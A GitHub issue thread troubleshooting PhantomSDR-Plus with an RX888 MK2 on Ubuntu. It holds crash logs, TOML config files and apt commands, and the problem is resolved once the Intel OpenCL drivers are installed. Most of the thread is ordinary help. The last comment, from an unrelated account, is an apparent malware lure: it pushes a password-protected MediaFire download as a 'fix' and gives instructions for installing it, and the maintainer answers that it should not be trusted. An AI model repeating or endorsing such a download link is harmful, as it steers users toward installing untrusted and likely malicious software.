### ISSUE TITLE
Error message

### ISSUE THREAD

**Issue by jpettingale** [Steven9101/PhantomSDR-Plus#9]
I installed version 1.50 on Ubuntu 22.04 to use with my RX888 MK2 and get the following error message when I run the program:

jonathan@kraken:~/PhantomSDR-Plus$ ./start-rx888mk2.sh
spectrumserver: no process found
rx888_stream: no process found

 __                   __ __  __      
|__)|_  _  _ |_ _  _ (_ |  \|__) _|_ 
|   | )(_|| )|_(_)|||__)|__/| \   |  
                                     
Thank you for using PhantomSDR+, you are supporting the Development of an Open-Source WebSDR Project ♥
Using OpenCL
terminate called after throwing an instance of 'char const*'
thread 'main' panicked at library/std/src/io/stdio.rs:1118:9:
failed printing to stdout: Broken pipe (os error 32)
note: run with `RUST_BACKTRACE=1` environment variable to display a backtrace
./start-rx888mk2.sh: line 8: 19846 Exit 101                ./rx888_stream/target/release/rx888_stream -f ./rx888_stream/SDDC_FX3.img -s 60000000 -g 60 -m low -d --pga -o -
     19847 Aborted                 (core dumped) | ./build/spectrumserver --config config-rx888mk2.toml
jonathan@kraken:~/PhantomSDR-Plus$

**Comment by hb3xdc** [comment]
Hi, could you try from inside phantomsdr dir:

sudo ./rx888_stream/target/release/rx888_stream -f ./rx888_stream/SDDC_FX3.img -s 58000000 -g 90 -m low -d --pga -o - | build/spectrumserver --config config_rx888.toml



Try it with my config (just change this part)

[input]
sps=58000000 # Input Sample Rate
fft_size=4194304 # FFT bins
brightness_offset=0 # Waterfall brightness offset. Reduce to negative if you see black regions in the waterfall
fft_threads=4 # FFT threads
frequency=0 # Baseband frequency
signal="real" # real or iq
accelerator="opencl" # Accelerator: none, cuda, opencl
audio_sps=12000 # Audio Sample Rate
audio_compression="flac" # flac or opus
waterfall_size=2048
waterfall_compression="zstd" # zstd or av1
smeter_offset=5

[input.driver]
name="stdin" # Driver name
format="s16" # Sample format: u8, s8, u16, s16, u32, s32, f32, f64

[input.defaults]
frequency=5505000 # Default frequency to show user
modulation="USB" # Default modulation


------------------------------------------------------------------
opencl is currently active, do you run it on an intel system?

**Comment by hb3xdc** [comment]
if its an intel system to enable GPU support try:

sudo apt install libclfft-dev
apt install ocl-icd-opencl-dev clinfo

Then you best reinstall Phantomsdr as its need to be recompiled after installing GPU support

**Comment by hb3xdc** [comment]
save config, then delte phantomsdr dir and

git clone --recursive https://github.com/Steven9101/PhantomSDR-Plus.git
cd PhantomSDR-Plus
chmod +x *.sh
sudo ./install.sh

**Comment by jpettingale** [comment]
Yes, it is an Intel system.
![Screenshot 2024-09-01 100950](https://github.com/user-attachments/assets/37bd65fa-049a-4cbd-b543-81bd867b6391)

ok, I will give all that a go, and let you know what happens!

**Comment by Steven9101** [comment]
Yea, opencl only works after you installed all of that and rebooted. Also you have to fully reinstall the software after running the commands.

So run these reboot and reinstall the software
sudo apt install libclfft-dev
sudo apt install ocl-icd-opencl-dev clinfo

**Comment by hb3xdc** [comment]
On my setup I had after opecl was enabled to run the command as root user:
sudo ./rx888_stream/target/release/rx888_stream -f ./rx888_stream/SDDC_FX3.img -s 58000000 -g 90 -m low -d --pga -o - | sudo build/spectrumserver --config config_rx888.toml

**Comment by jpettingale** [comment]
New error:

jonathan@kraken:~/PhantomSDR-Plus$ sudo ./rx888_stream/target/release/rx888_stream -f ./rx888_stream/SDDC_FX3.img -s 58000000 -g 90 -m low -d --pga -o - | sudo build/spectrumserver --config config_rx888.toml
[sudo] password for jonathan: 

 __                   __ __  __      
|__)|_  _  _ |_ _  _ (_ |  \|__) _|_ 
|   | )(_|| )|_(_)|||__)|__/| \   |  
                                     
Thank you for using PhantomSDR+, you are supporting the Development of an Open-Source WebSDR Project ♥
terminate called after throwing an instance of 'toml::v3::ex::parse_error'
  what():  File could not be opened for reading
thread 'main' panicked at library/std/src/io/stdio.rs:1118:9:
failed printing to stdout: Broken pipe (os error 32)
note: run with `RUST_BACKTRACE=1` environment variable to display a backtrace
Aborted
jonathan@kraken:~/PhantomSDR-Plus$

**Comment by Steven9101** [comment]
That is an issue with the config not properly formatted, please post the config.

**Comment by jpettingale** [comment]
[server]
port=80 # Server port
html_root="frontend/dist/" # HTML files to be hosted
otherusers=1 # Send where other users are listening, 0 to disable
threads=2

[websdr]
register_online=false # If the SDR should be registered on https://sdr-list.xyz then put it to true
name="ChangeThis" # Name that is shown on https://sdr-list.xyz
antenna="ChangeThis" # Antenna that is shown on https://sdr-list.xyz
grid_locator="ChangeThis" # 4 or 6 length Grid Locatlr shown on https://sdr-list.xyz and for the Distance of FT8 Signals
hostname="" # If you use ddns or something to host with a domain enter it here for https://sdr-list.xyz

[limits]
audio=1000
waterfall=1000
events=1000

[input]
sps=60000000 # Input Sample Rate
fft_size=8388608 # FFT bins
fft_threads=2
brightness_offset=0 # Waterfall brightness offset. Reduce to negative if you see black regions in the waterfall
frequency=0 # Baseband frequency
signal="real" # real or iq
accelerator="opencl" # Accelerator: none, cuda, opencl
audio_sps=44100 # Audio Sample Rate
audio_compression="flac" # flac or opus
waterfall_size=2048
waterfall_compression="zstd" # zstd or av1
smeter_offset=0

[input.driver]
name="stdin" # Driver name
format="s16" # Sample format: u8, s8, u16, s16, u32, s32, f32, f64

[input.defaults]
frequency=3645000 # Default frequency to show user
modulation="LSB" # Default modulation

**Comment by hb3xdc** [comment]
[server]
port=80 # Server port
html_root="frontend/dist/" # HTML files to be hosted
otherusers=1 # Send where other users are listening, 0 to disable
threads=2

[websdr]
register_online=false # If the SDR should be registered on https://sdr-list.xyz then put it to true
name="ChangeThis" # Name that is shown on https://sdr-list.xyz
antenna="ChangeThis" # Antenna that is shown on https://sdr-list.xyz
grid_locator="ChangeThis" # 4 or 6 length Grid Locatlr shown on https://sdr-list.xyz and for the Distance of FT8 Signals
hostname="" # If you use ddns or something to host with a domain enter it here for https://sdr-list.xyz

[limits]
audio=1000
waterfall=1000
events=1000

[input]
sps=58000000 # Input Sample Rate
fft_size=4194304 # FFT bins
brightness_offset=0 # Waterfall brightness offset. Reduce to negative if you see black regions in the waterfall
fft_threads=4 # FFT threads
frequency=0 # Baseband frequency
signal="real" # real or iq
accelerator="opencl" # Accelerator: none, cuda, opencl
audio_sps=12000 # Audio Sample Rate
audio_compression="flac" # flac or opus
waterfall_size=2048
waterfall_compression="zstd" # zstd or av1
smeter_offset=5

[input.driver]
name="stdin" # Driver name
format="s16" # Sample format: u8, s8, u16, s16, u32, s32, f32, f64

[input.defaults]
frequency=3645000 # Default frequency to show user
modulation="LSB" # Default modulation

**Comment by hb3xdc** [comment]
try to copy paste this into a file named config_rx888.toml in phantomsdr dir

**Comment by hb3xdc** [comment]
and replace just  [websdr] section with your setup infos

**Comment by Steven9101** [comment]
I think the directory you start the app from is wrong, the directory where you start the application from has to have the config.toml file

**Comment by jpettingale** [comment]
ok, I see the spelling difference now. The directory I run it from has the config.toml file in it.

new error:

jonathan@kraken:~/PhantomSDR-Plus$ sudo ./rx888_stream/target/release/rx888_stream -f ./rx888_stream/SDDC_FX3.img -s 58000000 -g 90 -m low -d --pga -o - | sudo build/spectrumserver --config config_rx888.toml
[sudo] password for jonathan: 

 __                   __ __  __      
|__)|_  _  _ |_ _  _ (_ |  \|__) _|_ 
|   | )(_|| )|_(_)|||__)|__/| \   |  
                                     
Thank you for using PhantomSDR+, you are supporting the Development of an Open-Source WebSDR Project ♥
Unable to open marker.json file. Using empty array for markers.
Using OpenCL
terminate called after throwing an instance of 'std::runtime_error'
  what():  No OpenCL platforms found
thread 'main' panicked at library/std/src/io/stdio.rs:1118:9:
failed printing to stdout: Broken pipe (os error 32)
note: run with `RUST_BACKTRACE=1` environment variable to display a backtrace
Aborted
jonathan@kraken:~/PhantomSDR-Plus$

**Comment by Steven9101** [comment]
Yea, that is caused by the driver, did you install it and then rebooted?

**Comment by Steven9101** [comment]
these sudo apt install libclfft-dev
apt install ocl-icd-opencl-dev clinfo

**Comment by Steven9101** [comment]
then type clinfo -l and post output

**Comment by jpettingale** [comment]
yes, i did as instructed, and rebooted.

jonathan@kraken:~/PhantomSDR-Plus$ sudo apt install libclfft-dev
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
libclfft-dev is already the newest version (2.12.2-3.2).
0 upgraded, 0 newly installed, 0 to remove and 4 not upgraded.
jonathan@kraken:~/PhantomSDR-Plus$ 

jonathan@kraken:~/PhantomSDR-Plus$ sudo apt install ocl-icd-opencl-dev clinfo
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
clinfo is already the newest version (3.0.21.02.21-1).
ocl-icd-opencl-dev is already the newest version (2.2.14-3).
0 upgraded, 0 newly installed, 0 to remove and 4 not upgraded.
jonathan@kraken:~/PhantomSDR-Plus$

**Comment by Steven9101** [comment]
What is output of clinfo -l

**Comment by jpettingale** [comment]
jonathan@kraken:~/PhantomSDR-Plus$ sudo clinfo -l
jonathan@kraken:~/PhantomSDR-Plus$

**Comment by Steven9101** [comment]
Yea that doesnt look too good

**Comment by ON5HB** [comment]
Paste the output of clinfo -l in here, else we can NOT help you any further.

**Comment by Steven9101** [comment]
Try this

sudo apt-get install intel-opencl-icd

Then post output of clinfo -l again please

**Comment by ON5HB** [comment]
When opencl works....you get output that looks like this:

clinfo -l
Platform #0: Intel(R) OpenCL Graphics
 `-- Device #0: Intel(R) HD Graphics 530

Else it will tell you just 0 and not output much more.....

**Comment by Steven9101** [comment]
Dont know if its much different on a i7 10750h because it uses a uhd, but shouldnt.

**Comment by ON5HB** [comment]
GPU = GPU :-)

**Comment by jpettingale** [comment]
Yayyyyyy!! apt-get worked it installed more files.

jonathan@kraken:~/PhantomSDR-Plus$ clinfo -l
Platform #0: Intel(R) OpenCL HD Graphics
 `-- Device #0: Intel(R) UHD Graphics [0x9bc4]
jonathan@kraken:~/PhantomSDR-Plus$ sudo ./rx888_stream/target/release/rx888_stream -f ./rx888_stream/SDDC_FX3.img -s 58000000 -g 90 -m low -d --pga -o - | sudo build/spectrumserver --config config_rx888.toml
[sudo] password for jonathan: 

 __                   __ __  __      
|__)|_  _  _ |_ _  _ (_ |  \|__) _|_ 
|   | )(_|| )|_(_)|||__)|__/| \   |  
                                     
Thank you for using PhantomSDR+, you are supporting the Development of an Open-Source WebSDR Project ♥
Unable to open marker.json file. Using empty array for markers.
Using OpenCL
Using OpenCL platform: Intel(R) OpenCL HD Graphics
Using OpenCL device: Intel(R) UHD Graphics [0x9bc4]
No FFTW wisdom file found. Planning from scratch. This may take long on the first time but will then be fast.
Waterfall is sent every 1 FFTs

THANK YOU!

**Comment by Steven9101** [comment]
No problem, enjoy!

**Comment by hb3xdc** [comment]
Great to heat that it worked :-)

**Comment by ON5HB** [comment]
Next time do give information, as it would have gotten us at this point a lot quicker....glad you found it.

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Steven9101** [comment]
I would not trust this
